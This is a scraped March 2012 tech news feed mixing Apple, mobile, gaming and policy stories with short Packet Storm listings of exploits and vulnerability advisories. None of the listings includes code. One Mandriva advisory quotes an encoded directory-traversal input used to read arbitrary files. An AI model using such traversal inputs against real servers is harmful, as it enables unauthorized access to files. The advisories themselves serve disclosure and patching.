Five years ago (2007), when the design was reportedly "tossed out", Apple's product landscape was quite different. Both the Apple TV and iPhone were first introduced in January of that year, and the App Store would not be launched for another year in mid-2008.

Update: Margolis clarifies what he meant to TheNextWeb:
The new UI shouldn’t come as a surprise to anyone. There is a clear effort at Apple to make everything match the look and feel of their popular iOS products – starting with Lion and increasing momentum with Mountain Lion.

To be clear – he didn’t like the original grid. This was before the iPhone was popular and before the iPad even existed.

Given that the iPad is far more successful than the AppleTV, migrating the AppleTV to look more like the iPad was probably a very smart move – even if some of the users of the old UI don’t prefer the new one.

Update 2: TechCrunch posts a longer response from Margolis who seems to be downplaying his previous tweet:
Steve rejecting a design five years ago isn’t a huge deal. Steve was well known for rejecting ideas, tweaking them, and turning them into something even better. And that’s a very good thing. One of my favorite parts of working at Apple was knowing that SJ said “no” to most everything initially, even if he later came to like it, advocate for it, and eventually proudly present it on stage. This helped the company stay focused and drove people to constantly improve, iterate, and turn the proverbial knob to 11 on everything.



Recent Mac and iOS Blog Stories
Lines of Resellers Returning New iPads at Fifth Avenue Apple Store
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac


Channel Image17:00 Week in Gaming: Bioware tries to calm fans, EA shuts them out of online servers» Ars Technica

What at first seemed like a relatively benign story about Internet protests over the ending of Mass Effect 3 became an enduring story this week, with Bioware publicly addressing the complaints very respectfully amid growing furor. Also this week, EA announced server shutdowns for over a dozen of its online games, including some that were released relatively recently.

We're starting to gear up for PAX East in Boston these days. Anyone got any recommendations for either the show or the surrounding cityscape?

Read the rest of this article...

Read the comments on this post


Channel Image16:55 Tim Hendriks Content Management System SQL Injection» Files ≈ Packet Storm
Tim Hendriks Content Management System suffers from a remote SQL injection vulnerability.
Channel Image16:36 RIM putting BlackBerry 10 test units in developers' hands in May» Engadget
It's telling, perhaps, when a VP for your company uses the word "finally" while discussing plans to release test models for your upcoming mobile operating system -- but it's certainly a pretty accurate sentiment when dealing BlackBerry 10. Talking up RIM's plans to release up to 2,000 prototypes running the OS at the BlackBerry Jam conference in May, executive Alec Saunders had this to say: "It's tangible evidence of the company making progress to finally shipping the device." Barring any further setbacks, the operating system formerly known as BBX is set to hit before year's end.

[Thanks, Neil]

RIM putting BlackBerry 10 test units in developers' hands in May originally appeared on Engadget on Sat, 24 Mar 2012 11:36:00 EDT. Please see our terms for use of feeds.

Permalink   |  sourceBloomberg  | Email this | Comments
Channel Image16:20 Angry Birds Space coming to Windows Phone after all» GadgeTell
This will definitely make Windows Phone users happy. Rovio Chief Executive Mikael Hed told Reuters that they are now “working towards getting Angry Birds Space to WP7.” This dismisses earlier report saying that the game will not be released on Windows Phone platform. Unfortunately, there’s now scheduled release date yet. So, if you’re a Windows more »
Channel Image16:00 Week in Apple: it's dividend time!» Ars Technica

Pixel-pumping prowess: Ars reviews the third-generation iPad: Extra memory, faster chips, a huge new battery—the third-generation iPad needs them all to drive its high-resolution screen.

Apple to announce plans for $100 billion cash pile on Monday: Apple made a surprise announcement saying it would make public its plans for its nearly $100 billion cash hoard.

Read the rest of this article...

Read the comments on this post


Channel Image15:44 Libraptor XXE In RDF/XML File Interpretation» Files ≈ Packet Storm
VSR identified a vulnerability in multiple open source office products (including OpenOffice, LibreOffice, KOffice, and AbiWord) due to unsafe interpretation of XML files with custom entity declarations. Deeper analysis revealed that the vulnerability was caused by acceptance of external entities by the libraptor library, which is used by librdf and is in turn used by these office products.
Channel Image15:00 Week in science: first planet's apparence and the third planet's energy» Ars Technica

Last weekend saw the return of Weird Science, which barely snuck on to our list of the top stories. It faced fierce competition from a number of stories on energy—the cost of coal, efficient LEDs, the displacement of fossil fuels, and a new method of making solar panels. Our most detailed look yet at the planet Mercury also proved to be very popular.

Read the rest of this article...

Read the comments on this post


Channel Image14:56 Veille sur Pinterest : publications associées à un domaine» Denis Szalkowski Formateur Consultant
Le seul intérêt dans la recherche proposée par Pinterest, c'est la possibilité d'obtenir toutes les publications associées à un nom de domaine.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image14:33 Drupal FCKEditor/CKEditor PHP Execution» Files ≈ Packet Storm
Drupal FCKEditor/CKEditor module remote PHP code execution exploit.
Channel Image14:33 RealPlayer 1.1.4 Memory Corruption» Files ≈ Packet Storm
RealPlayer SP1 versions 1.1.4 Build 12.0.0.756 and below suffer from a memory corruption vulnerability.
Channel Image14:11 RIPS 0.53 Local File Inclusion» Files ≈ Packet Storm
RIPS versions 0.53 and below suffer from multiple local file inclusion vulnerabilities.
Channel Image14:08 Flickr updates Favorites page with Justified View» GadgeTell
Similar to what it has done with the Contacts page, Flickr has also applied the better-looking justified view to its Favorites pages. If you’re fond of marking photos that mean so much to you, be it your own photos or photos from your contacts and other Flickr users, you can now select to view these more »
Channel Image14:00 Week in tech: flying Pi drones, Facebook passwords, and virtual desktops» Ars Technica

Pirate Bay plans to build aerial server drones with $35 Linux computer: The Pirate Bay has announced plans to build a fleet of flying server drones using the Raspberry Pi ARM board. The airborne computers will reportedly be more difficult for law enforcement agencies to terminate.

Facebook says it may sue employers who demand job applicants' passwords: After an alarming increase in reports of employers demanding Facebook usernames and passwords, Facebook said it is willing to take legal action.

Read the rest of this article...

Read the comments on this post


Channel Image13:43 Chevrolet replacing 120-volt power cords on most Volt automobiles» Engadget
ImageIf you're one of the 10,000 or so folks who pay insurance on a Chevrolet Volt, you may have a new cable coming your way. According to The Detroit News and Yahoo! Autos, General Motors will soon be sending out replacement 120-volt charging cords for Volt automobiles, which are said to "offer some more consistency in charging," while also making it more durable. We're told that some of the newfangled chargers have shipped with recent Volts, but the majority of customers were sent home with the older model. Of note, GM won't be swapping out any of those optional 240-volt cords, and the company won't consider this a recall or safety issue. As for getting your replacement? Owners are slated to be notified directly in the "next few weeks."

Chevrolet replacing 120-volt power cords on most Volt automobiles originally appeared on Engadget on Sat, 24 Mar 2012 08:43:00 EDT. Please see our terms for use of feeds.

Permalink Autoblog  |  sourceThe Detroit News, Yahoo! Autos  | Email this | Comments
Channel Image13:12 MediaSolusi SQL Injection» Files ≈ Packet Storm
MediaSolusi suffers from a remote SQL injection vulnerability.
Channel Image13:00 US cyber-tsar: Tackle jailbroken iPhones» Latest Articles

White House cybersecurity adviser Howard Schmidt discusses the implications of bring-your-own device policies, as well as how intelligence agencies and businesses could share more information

(ZDNet UK - Security Threats)

Channel Image11:28 Epic Mickey 2 controllers invoke the power of the brush, are made for you and me» Engadget
Image
Do you like your M-I-C-K-E-Y M-O-U-S-E with a side of eXtreme? So do the developers at Junction Point, which is why a sequel to the mouse's first Epic is on its way. But the impending release of that title's not all grown-up Mouseketeers-cum-gamers have to look forward to, as two special WiiMote peripherals are also apparently on deck. Shown off at a preview event for Epic Mickey 2, the prototype accessories are made to mimic in-game "weapons," like Oswald's controller and Mickey's paintbrush. The designs aren't final, but as you'll see in the source below, they should make for an excellent addition to any diehard's Disneyana collection.

Epic Mickey 2 controllers invoke the power of the brush, are made for you and me originally appeared on Engadget on Sat, 24 Mar 2012 06:28:00 EDT. Please see our terms for use of feeds.

Permalink   |  sourceJoystiq  | Email this | Comments
Channel Image09:17 Huawei Fusion hits AT&T's GoPhone lineup, prepaid Gingerbread for $125 (update)» Engadget
Image
Hey, not everyone needs a bunch-of-core superphone tied down to a two-year contract, so it's always nice to have some solid prepaid options, right? If you shook your head yes to that, you'll be pleased to know that AT&T's just added the Android Gingerbread-loaded Huawei Fusion to its GoPhone lineup. The device features a 3.5-inch (320 x 480) display up front, while on back there's a 3.2-megapixel shooter. Other goodies include Bluetooth 2.1, FM radio functionality and support for up to 32GB of storage via MicroSD. If you're still nodding your noggin, the Fusion and its (essentially) utilitarian specs can be yours for the keeping, sans contractual commitment, for just $125. You'll find more info at the links below.

Update: Well, our mistake folks. It turns out this phone has been available on AT&T for quite some time now. Thanks to everyone in the comments for pointing this out.

Huawei Fusion hits AT&T's GoPhone lineup, prepaid Gingerbread for $125 (update) originally appeared on Engadget on Sat, 24 Mar 2012 04:17:00 EDT. Please see our terms for use of feeds.

Permalink PhoneScoop  |  sourceAT&T  | Email this | Comments
Channel Image06:54 NVIDIA CEO suggests Kepler GPUs could be headed to future 'superphones'» Engadget
Image
NVIDIA looking for a piece of next-generation smartphones shouldn't come as much of a surprise to anyone, but CEO Jen-Hsun Huang dropped a few details in a recent email to staffers that's sure to spur at least a little excitement. As AnandTech reports, in addition to marking the launch of the company's new Kepler-based GeForce GTX 680 graphics card, he also looked towards future possibilities for the GPU, noting that "today is just the beginning of Kepler," and that "because of its super energy-efficient architecture, we will extend GPUs into datacenters, to super thin notebooks, to superphones." Not surprisingly, that's about as specific as things got as far as mobile devices are concerned, with no mention whatsoever as to when we might see such Kepler-based "superphones."

NVIDIA CEO suggests Kepler GPUs could be headed to future 'superphones' originally appeared on Engadget on Sat, 24 Mar 2012 01:54:00 EDT. Please see our terms for use of feeds.

Permalink Phone Arena  |  sourceAnandTech  | Email this | Comments
Channel Image06:42 Extracteur d’urls en PHP» Denis Szalkowski Formateur Consultant
Un aller simple pour le PHP !Décidément, PHP, par sa rapidité à coder, par sa simplicité, n'en finira pas de nous surprendre !!!

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image04:33 Motorola Connected Home Gateway home automation all-in-one hits the FCC with Verizon tags» Engadget
Image
We first got our eyes on Motorola's Connected Home Gateway home automation box during CES 2012, and now that it's passed through the FCC it should be ready to do its all-in-one magic in real consumer's homes sometime soon. What makes this device special is its ability to speak more than one of the various wireless home control protocols currently in use, easily connecting to, controlling and spitting out macros to make multiple things happen with a minimum of user interference or setup. Want to dim the lights, lower the temperature and turn on security cams as soon as you step outside your door? It can do that. This will all be a part of Verizon's Z-wave based Home Monitoring and Control system at some point, if you're still wondering what possibilities are out there, check out our CES demo video embedded after the break.

Continue reading Motorola Connected Home Gateway home automation all-in-one hits the FCC with Verizon tags

Motorola Connected Home Gateway home automation all-in-one hits the FCC with Verizon tags originally appeared on Engadget on Fri, 23 Mar 2012 23:33:00 EDT. Please see our terms for use of feeds.

Permalink   |  sourceFCC  | Email this | Comments
Channel Image04:02 Tech Comics: "Zeno's Paradox"» Linux Today
Channel Image03:50 GeForce GTX 680, Part 2: SLI, 5760x1080, And Overclocking» Reviews Tom's Hardware US
GeForce GTX 680, Part 2: SLI, 5760x1080, And OverclockingWho needs sleep when you have caffeine? We take a second GeForce GTX 680 and run it in SLI against two Radeon HD 7970s. Then we add 5760x1080 benchmark results. Then we overclock our single-GPU flagships for a third comparison. Does our story change?
Channel Image02:58 Permoveh personal vehicle prototype can travel sideways, diagonally (video)» Engadget
Image
We've seen all sorts of great ideas to assist with personal mobility, and we think this prototype is up there with the rest of them. The Permoveh (from Personal Mobile Vehicle) was developed by Komori Masaharu, an associate professor from Kyoto University. Using a clever wheel-in-wheel system, the buggy can travel diagonally and laterally, with no need for turning space. The idea allows wheelchair users access to places that otherwise might have been too difficult with existing vehicles. Sadly we don't know whether we'll see this in production any time soon, but if you head on over the break, you'll see its creator showing off its moves.

Continue reading Permoveh personal vehicle prototype can travel sideways, diagonally (video)

Permoveh personal vehicle prototype can travel sideways, diagonally (video) originally appeared on Engadget on Fri, 23 Mar 2012 21:58:00 EDT. Please see our terms for use of feeds.

Permalink Dvice  |  sourceKyodonews  | Email this | Comments
Channel Image02:08 AT&T’s two cents on T-Mobile call center layoffs» GadgeTell
T-Mobile announced on Thursday it would be closing seven call centers in the United States. 3,300 employees will be affected by this, but T-Mobile estimates it will only be out 1,900 employees once the company hires 1,400 more workers. In light of this announcement, AT&T stepped from the sidelines to give its opinion on the more »
Channel Image02:00 Oracle Database Certified for Red Hat Enterprise Linux 6, Oracle 6» Linux Today
EntepriseAppsToday: Over a year after Oracle released its own flagship Linux release, its namesake database is finally certified to run on it.
Channel Image02:00 Intel Engineer Confirms 22 nm Atom Will be Named "Valley View"» DailyTech Main News Feed
New silicon is expected to land in 2013
Channel Image01:33 US Army debuts app marketplace prototype: iOS first, Android coming soon» Engadget
Image
The promise of an Army app store has been bandied about for quite a while now, but it looks like it's slowly becoming a reality. The US Army has today officially announced a prototype of the Army Software Marketplace, a web-based app store that currently includes twelve different training apps that have been approved for Army-wide use. That includes just iOS apps initially, but the Army promises that it will soon include apps for Android devices as well. It's also of course looking to expand considerably beyond those dozen odd apps, noting that the prototype is just "a first step in establishing and exercising new submission and approval processes that will eventually enable Army members, organizations and third-party developers to release applications for Army-wide distribution." And you thought the approval process for some of the current app stores was stringent.

[Thanks, Souheil]

US Army debuts app marketplace prototype: iOS first, Android coming soon originally appeared on Engadget on Fri, 23 Mar 2012 20:33:00 EDT. Please see our terms for use of feeds.

Permalink   |  sourceUS Army  | Email this | Comments
Channel Image00:59 Mandriva Linux Security Advisory 2012-037» Files ≈ Packet Storm
Mandriva Linux Security Advisory 2012-037 - The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message. The updated packages have been patched to correct this issue.
Channel Image00:56 King of Fighters now available for select Android devices» GadgeTell
King of Fighters, possibly one of the most popular arcade fighting game has just landed on Android after several months of being released for iOS. Confirmed to work fine with Samsung Galaxy S 2, Samsung Galaxy Tab 10.1, Sony Ericsson Xperia, Xperia Play and possibly some more Android tablets and smartphones (Google Play is showing more »
Channel Image00:53 Mandriva Linux Security Advisory 2012-036» Files ≈ Packet Storm
Mandriva Linux Security Advisory 2012-036 - Directory traversal vulnerability in soup-uri.c in SoupServer in libsoup before 2.35.4 allows remote attackers to read arbitrary files via a \%2e\%2e in a URI. The updated packages have been patched to correct this issue.
Channel Image00:53 Mandriva Linux Security Advisory 2012-035» Files ≈ Packet Storm
Mandriva Linux Security Advisory 2012-035 - Multiple out-of heap-based buffer read flaws and invalid pointer dereference flaws were found in the way file, utility for determining of file types processed header section for certain Composite Document Format files. A remote attacker could provide a specially-crafted CDF file, which once inspected by the file utility of the victim would lead to file executable crash. The updated packages for Mandriva Linux 2011 have been upgraded to the 5.11 version and the packages for Mandriva Linux 2010.2 has been patched to correct these issues.
Channel Image00:49 Apache Traffic Server Host Header Denial Of Service» Files ≈ Packet Storm
Apache Traffic Server versions prior to 3.0.4 as well as all development releases prior to 3.1.3 suffers from a remote denial of service vulnerability.
Channel Image00:48 Prado 3.x Cross Site Scripting» Files ≈ Packet Storm
Prado PHP Framework version 3.x suffers from a cross site scripting vulnerability.
Channel Image00:47 Mandriva Linux Security Advisory 2012-034» Files ≈ Packet Storm
Mandriva Linux Security Advisory 2012-034 - libzip uses an incorrect loop construct, which can result in a heap overflow on corrupted zip files. libzip has a numeric overflow condition, which, for example, results in improper restrictions of operations within the bounds of a memory buffer. The updated packages have been upgraded to the 0.10.1 version to correct these issues.
Channel Image00:46 Apache Struts2 Local Code Execution» Files ≈ Packet Storm
Apache Struts2 suffers from a xsltResult local code execution vulnerability.
Channel Image00:44 phpFox 3.0.1 Remote Command Execution» Files ≈ Packet Storm
phpFox versions 3.0.1 and below remote command execution exploit that leverages ajax.php.
Channel Image00:44 CoreCommerce SQL Injection» Files ≈ Packet Storm
CoreCommerce suffers from a remote SQL injection vulnerability.
Channel Image00:43 FreePBX 2.10.0 / Elastic 2.2.0 Remote Code Execution» Files ≈ Packet Storm
FreePBX version 2.10.0 and Elastic version 2.2.0 remote root code execution exploit.
Channel Image00:41 mmPlayer 2.2 .ppl Buffer Overflow» Files ≈ Packet Storm
mmPlayer version 2.2 buffer overflow exploit that makes a malicious .ppl file.
Channel Image00:38 Oracle's Anti-Android Java Lawsuit Likely to be Settled For Under $100M USD» DailyTech Main News Feed
Google may pay a bit in ongoing licensing fees, but the settlement for past damages will be small
Channel Image00:00 Git PHP. RIP Subversion» Linux Today
InternetNews: Will PHP's move to Git accelerate development?
Channel Image00:00 FCC Fridays: March 23, 2012» Engadget
Image
We here at Engadget tend to spend a lot of way too much time poring over the latest FCC filings, be it on the net or directly on the ol' Federal Communications Commission's site. Since we couldn't possibly (want to) cover all the stuff that goes down there individually, we've gathered up an exhaustive listing of every phone and / or tablet getting the stamp of approval over the last week. Enjoy!

Continue reading FCC Fridays: March 23, 2012

FCC Fridays: March 23, 2012 originally appeared on Engadget on Fri, 23 Mar 2012 19:00:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments

Fri 23 March, 2012

Channel Image23:45 Hulu Plus adds a few additional devices to the supported list» GadgeTell
It looks like the folks over at Hulu have recently added to the support device list for Hulu Plus. The new support is available immediately and is for “select” Toshiba 2012 Blu-ray players, Sharp 2012 TVs and Best Buy’s Dynex Blu-ray players. Of course, even with the newly added support, those interested in viewing Hulu more »
Channel Image23:01 iRobot and Willow Garage Debate Closed vs. Open Source Robotics at Cocktail Party» Linux Today
IEEE Spectrum: "What's the best approach to building commercially successful robotics companies: To develop specific, proprietary products that satisfy the needs of large markets, or to develop and share free, open-source technologies and wait for the commercial applications to emerge?"
Channel Image22:34 Kindle for Android gets an update, brings Send-to-Kindle functionality» GadgeTell
It looks like Amazon has rolled-out the latest update for the Kindle Android app. And nicely done, the updated Kindle app includes support for Send-to-Kindle functionality. Well, that and support for the Kindle Format 8 and an increased selection of illustrated children’s books, comic books, and graphic novels. More specifically, those using Kindle for Android more »
Channel Image22:33 Xbox 360's Comcast Xfinity TV app in beta testing, won't count against data caps when it launches» Engadget
Image
We're still waiting for the Comcast Xfinity TV app to appear on our Xbox 360 dashboards, but word is its beta tests have expanded to cover more Microsoft and Comcast employees, and it could launch as soon as the next week or so. In case you're wonder exactly what its capabilities will be when it will arrives, a post over at AVSForum points out a support page that's already live and details both the requirements for service and content available. Customers that have Xbox Live Gold and both internet and video services from Comcast will be able to log into the app with their ID and view video on-demand (no live TV) including free videos, national broadcasters and premium channels. That includes access to HBO Go (which will already have an app) and additional content from Max Go, as well as other premium stations -- basically the same lineup currently available on the Xfinity website. Also notable is confirmation that the cross-provider content search Microsoft is so proud of will apply here, and that any video viewed through the app won't count against those 250GB data caps Comcast has in place. Hit the link below for all the answers currently available, we'll wait until its actually launched to try out the promised Kinect voice and gesture control features.

[Thanks, Tyler]

Xbox 360's Comcast Xfinity TV app in beta testing, won't count against data caps when it launches originally appeared on Engadget on Fri, 23 Mar 2012 17:33:00 EDT. Please see our terms for use of feeds.

Permalink AVS Forum  |  sourceComcast  | Email this | Comments
Channel Image22:18 Friday Squid Blogging: Giant Squid Eyes» Schneier on Security
It seems that the huge eyes of the giant squid are optimized to see sperm whales....
Channel Image22:02 Eucalyptus, OpenStack dogfight in cloud war» Linux Today
IT World: "A new whitepaper from enterprise storage service provider Nasuni Corporation has portrayed parent company Rackspace as the worst data migrator between Rackspace Cloud Files, AWS's Simple Storage Service (S3), and Microsoft Window Azure storage."
Channel Image22:01 Rdio inks deal to license UK music, but doesn't offer up a visit date» Engadget

One of those other music subscription services has inched towards British shores, announcing a licensing deal with PRS for Music, a not-for-profit organization representing around 85,000 songwriters and music publishers. The San Francisco-made music service has already launched across Europe, the US and Brazil, but still remains out of reach for Brits. While it's far from a confirmation of intent, the service might have plans to jump across to the land of royalty, Rich Tea biscuits and RPattz pretty soon.

Rdio inks deal to license UK music, but doesn't offer up a visit date originally appeared on Engadget on Fri, 23 Mar 2012 17:01:00 EDT. Please see our terms for use of feeds.

Permalink The Next Web  |  sourcePRS for Music  | Email this | Comments
Channel Image21:45 AT&T declares it could have saved T-Mobile from job losses» Ars Technica

AT&T has issued an I-told-you-so press release addressing the T-Mobile layoffs announced Friday, asserting that they wouldn't have happened if the FCC had just let AT&T buy T-Mobile. Jim Cicconi, AT&T's senior executive vice president of external and legislative affairs, said in the statement that T-Mobile's recent misfortune demonstrates the need for more "regulatory humility," and that "the truth of who was right is sadly obvious." AT&T is referring, of course, to itself.

While AT&T was trying to acquire T-Mobile, the company asserted that the merger would create many jobs, a claim that the FCC and the US Department of Justice refused to believe. In fact, the FCC stated in its own report that the merger would create a "net loss of direct jobs."

T-Mobile stated Friday that it plans to close seven call centers and cut 1,900 jobs. In AT&T's press release, Cicconi said that the company planned specifically to protect "these very same small call centers and jobs if our merger was approved," and that the job loss has proven the FCC made the wrong choice.

Of course, the FCC's and DoJ's real concern was that the reduction in competition that the merger would have created. Four billion dollars later, AT&T is apparently still smarting at their decision.

Editor's Update: Friday evening, a spokesperson for the FCC sent an e-mail to All Things D flatly denying claims made by AT&T's petulant press release, saying "The bottom line is that AT&T’s proposal to acquire a major competitor was unprecedented in scope and the company’s own confidential documents showed that the merger would have resulted in significant job losses." The spokesperson did not elaborate on the details of those confidential documents. 

Read the comments on this post


Channel Image21:36 Developer Sees Quick Adoption of iOS 5.1 Amongst Users» MacRumors: Mac News and Rumors - Front Page
iOS developer David Smith has been posting iOS version stats for his Universal app Audiobooks [Direct Link]. Smith gets about 100,000 weekly downloads to both his paid and free versions and believes it is a statistically meaningful data set.

With the launch of iOS 5.1 on March 7th, 2012, Smith has been tracking the adoption rate which he suspected would be faster than in the past due to the availability of over the air (OTA) iOS updates. Indeed, after only 5 days after its initial release, Smith found that 50% of his OTA-eligible customers were already at iOS 5.1. Now, after 15 days, he's found that 77% of OTA-eligible iOS customers have upgraded to the latest version.

When he backs out to include all versions of iOS, including versions such as iOS 3 and iOS 4 which don't offer OTA updates, he finds total adoption at 61% in 15 days.


This seems to represent a significant boost in adoption for OTA-eligible upgraders.

While we don't have directly comparable numbers, it took iOS 4.0 one month to hit 50% usage by web traffic. Unfortunately, the numbers aren't entirely interchangeable, as there they are from different data sets (app usage vs web usage), but gives you an idea of the scale. If anything, factors should have contributed to a faster uptake for iOS 4 than would have been expected as it was a major new feature release (vs 5.1) at the time and was included in the successful iPhone 4 launch.

As Smith points out, this is the same level of adoption Android currently sees for Gingerbread (v2.3) which was launched much earlier (mid/late 2011). Meanwhile, the latest version of Android (Ice Cream Sandwidth/v4.0) is only at ~1.6% adoption after about 5 months.

Apple introduced "over-the-air" iOS updates as of iOS 5.0 -- allowing users to upgrade without connecting their device to a computer. They've since deployed two different upgrades (5.01 and 5.1) to users.


Recent Mac and iOS Blog Stories
Lines of Resellers Returning New iPads at Fifth Avenue Apple Store
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac


Channel Image21:30 T-Mobile Lays Off 1,900 Workers, AT&T Tells FCC "Told ya so"» DailyTech Main News Feed
AT&T still isn't done badmouthing the FCC
Channel Image21:25 Apple updates iTunes Movie Trailers app, lets your Retina watch high-res teasers» Engadget
Apple updates iTunes Movie Trailers app, lets your Retina watch high-res teasers
Following in the steps of apps like Kindle, Evernote, Vimeo and most recently Netflix, Apple's Movie Trailers app has been on the receiving end of a Retina-friendly refresh. Version 1.1 doesn't reveal any other changes besides the 2048 x 1536 compatibility, which should be more than enough reasons to make you a happy camper. Now you'll be able to drool over The Avengers teaser over and over in 1080p -- a well-deserved retreat after flicking through your stack of CMX-HD books. The resolutionary app is up for grabs now, and you can get it straight from your shiny new iPad or via the source link below.

Apple updates iTunes Movie Trailers app, lets your Retina watch high-res teasers originally appeared on Engadget on Fri, 23 Mar 2012 16:25:00 EDT. Please see our terms for use of feeds.

Permalink The Verge  |  sourceiTunes (App Store)  | Email this | Comments
Channel Image21:11 Voice paging systems recorder seeks millions in damages from Megaupload» Ars Technica

Valcom, a company that makes automatic voice paging systems that function over analog and IP lines is suing Megaupload.com for copyright damages, saying that a “significant number” of its more than 6,000 audio and video titles were distributed illegally through the file-sharing site. Valcom's clients include school, government, and transportation systems, which use the company's recordings in the event of emergencies or as background easy-listenin' music in brick-and-mortar waiting areas.

Megaupload was a popular cyberlocker seized by the Feds in January for criminal copyright infringement, money laundering, and racketeering.

The recording company stated in a press release that it had filed a suit against Megaupload, which had an associated shell company responsible for causing "an estimated half-billion dollars in copyright losses" altogether, noting that cases of willful copyright infringement can result in damages ranging from $750 to $150,000 per copyright infringed. Valcom's legal counsel will seek a slice of some of the millions of dollars seized by government authorities for each of the copyrights that Valcom can prove were infringed upon.

The Next Web suggests that Valcom could sue for as much as $900 million in damages if all 6,000 titles were infringed upon and if the company could make the case that each copyright merited a $150,000 remittance, but the actual number Valcom seeks will most likely be much lower than that, as Valcom only claims a portion of its copyright library was used illegally. Ars contacted Valcom but did not receive an immediate response.

Valcom's claim may be only the first in a flurry of suits against Megaupload seeking recompense for alleged lost profits, and only the start for Valcom's new "aggressive initiative to acquire back-due royalties and compensation... for the benefit of the Company and to increase value for our shareholders," according to a statement made by Vince Vellardita, President and CEO of Valcom.

Read the comments on this post


Channel Image21:07 PlayOnLinux 4.0.16 now can start exe from terminal, support for Desura and more» Linux Today
Unixmen: "PlayonLinux can now start an executable from the terminal (Exp: playonlinux file.exe), added support for Desura, easy access to the virtual disks right from your home directory and more."
Channel Image21:01 Listen to the Engadget Mobile Podcast at 5PM ET, with special guest Sascha Segan!» Engadget
Image
We enjoy having special guests on the podcast from time to time, because it's nice to get a unique perspective on some of the latest happenings in the world of mobile. And we think you'll be happy with this week's honored selection, PCMag.com's very own Sascha Segan. So join us as we welcome him onto the show and discuss the hot topics (Heatgate?) -- and maybe a few cold ones (Ice Cream Sandwich?) -- and all the lukewarm stuff in the middle. Who knows, it could get pretty crazy. Join us at 5PM ET!

March 23, 2012 5:00 PM EDT

Listen to the Engadget Mobile Podcast at 5PM ET, with special guest Sascha Segan! originally appeared on Engadget on Fri, 23 Mar 2012 16:01:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments
Channel Image20:46 MOG opens its doors to Windows with new desktop application» Engadget
Image
Been aching to get your MOG on, now that music streaming service is all over the news, after all that acquisition talk? The proposition just got a bit easier with the introduction of a new application for Windows. The desktop-bound version of the service features built-in AirPlay support, a native audio decoder and a UI that should prove familiar to browser-based users. To get the Windows version like the blue fuzzy fellow above (or the boring old Mac app), click the source link below.

MOG opens its doors to Windows with new desktop application originally appeared on Engadget on Fri, 23 Mar 2012 15:46:00 EDT. Please see our terms for use of feeds.

Permalink The MOG Blog  |  sourceMOG  | Email this | Comments
Channel Image20:33 Insert Coin: Galileo, the remote control camera from the men behind the Gorillapod» Engadget
In Insert Coin, we look at an exciting new tech project that requires funding before it can hit production. If you'd like to pitch a project, please send us a tip with "Insert Coin" as the subject line.
Image
FaceTime conversations always commence with "left a bit, no, up a bit, no no, that's too far..." as we balance our iOS handsets to find a flattering angle. Gorillapod designers Josh Guyot and JoeBen Bevirt want to put an end to it with Galileo, a 360 degree motorized remote-control base for your iPhone or iPod Touch. If your buddy moves out of frame, just swipe in their direction and it'll pan around to follow. Designed as a video conferencing tool, it would also be useful as a baby monitor, remote camera or for clever photography projects. You'll also find a universal 1/4" tripod mount screw, rechargeable lithium polymer battery and it'll double as a dock when not in use. The project has currently reached $10,093 of its $100,000 goal, with the pre-order price of one of the units pegged at $85. If you'd care to see it in action, we'd suggest taking a trip downtown past the break.

[Thanks, Max]

Continue reading Insert Coin: Galileo, the remote control camera from the men behind the Gorillapod

Insert Coin: Galileo, the remote control camera from the men behind the Gorillapod originally appeared on Engadget on Fri, 23 Mar 2012 15:33:00 EDT. Please see our terms for use of feeds.

Permalink   |  sourceKickstarter  | Email this | Comments
Channel Image20:20 Scammers attempt to trick fans with promise of new Mass Effect 3 endings » Ars Technica

Where there is passion on the internet, there is someone who seeks to exploit it. Thus, in the wake of the massive fan-driven controversy surrounding the ending of Mass Effect 3, a new scam has been unearthed that seeks to trick users into clicking on affiliate advertising offers in exchange for a download of a supposed "new ending."

The spam email, as uncovered by GFI, directs users to download a ZIP file containing a password-protected downloader for the supposed new ending. A text file inside the ZIP instructs downloaders to go to a web site where they're asked to take part in one of a number of shady offers to get access to the supposed password.

"Last Mass Effect 3 Ending, was really bad, but here, you have NEW, EXCITING ENDING," reads the download page. "You only need, to downlad [sic], and run it, downloader will automacitally [sic] start, download, new ending files, you will like it!"

You'd think obvious misspellings like "automacitally" and the generally poor grammar would raise the warning bells for users even remotely familiar with internet security, but nevertheless the download link has attracted at least a few hundred gullible players since its first appearance, according to publicly displayed statistics.

Recently, Bioware told fans they would be working to address the rampant criticism of the Mass Effect trilogy's vague ending with new downloadable content that will help answer lingering questions. However, the official DLC will not be available until April, and will likely only be available on Xbox Live, the PlayStation Network, and Origin (EA's download service.) Even then, it's unclear whether the new content will significantly change the game's existing ending or merely add new context an explanation to the existing narrative.

Read the comments on this post


Channel Image20:10 "Teach the controversy" science education bills advance in Tennessee, Oklahoma» Ars Technica

Earlier this week, legislators in Tennessee approved a bill that singles out public school science education for special attention. Now, the Oklahoma House has passed a very similar bill that attacks an identical range of subjects that the legislation deems controversial: biological evolution, the chemical origins of life, global warming, and human cloning.

Both bills contain identical language, saying they "shall not be construed to promote any religious or nonreligious doctrine." There's also identical language about how they're intended to "help students develop critical thinking skills they need in order to become intelligent, productive, and scientifically informed citizens." However, the subjects they target are not areas where there are significant scientific controversies; either the bills' sponsors are poorly informed (and thus shouldn't be injecting themselves into science education), or they have non-educational goals in mind.

In any case, the legislators want to do what they can to enable science teachers to teach the controversy. To that end, they're basically attempting to block any educational authority—school board, principal, the state board of education—from punishing a teacher for covering the "scientific strengths and scientific weaknesses of existing scientific theories." The Oklahoma bill goes a bit further, adding protections for students who choose voice their disagreements with the science in any medium.

Given the staggering amount of scientific-sounding misinformation available on topics like evolution and climate change, these bills are a recipe for chaos in the science classrooms. It's a chaos that state legislators are inviting local school districts to sort out at great expense via lawsuits.

Read the comments on this post


Channel Image20:08 Engadget Podcast 286 - 03.23.2012» Engadget
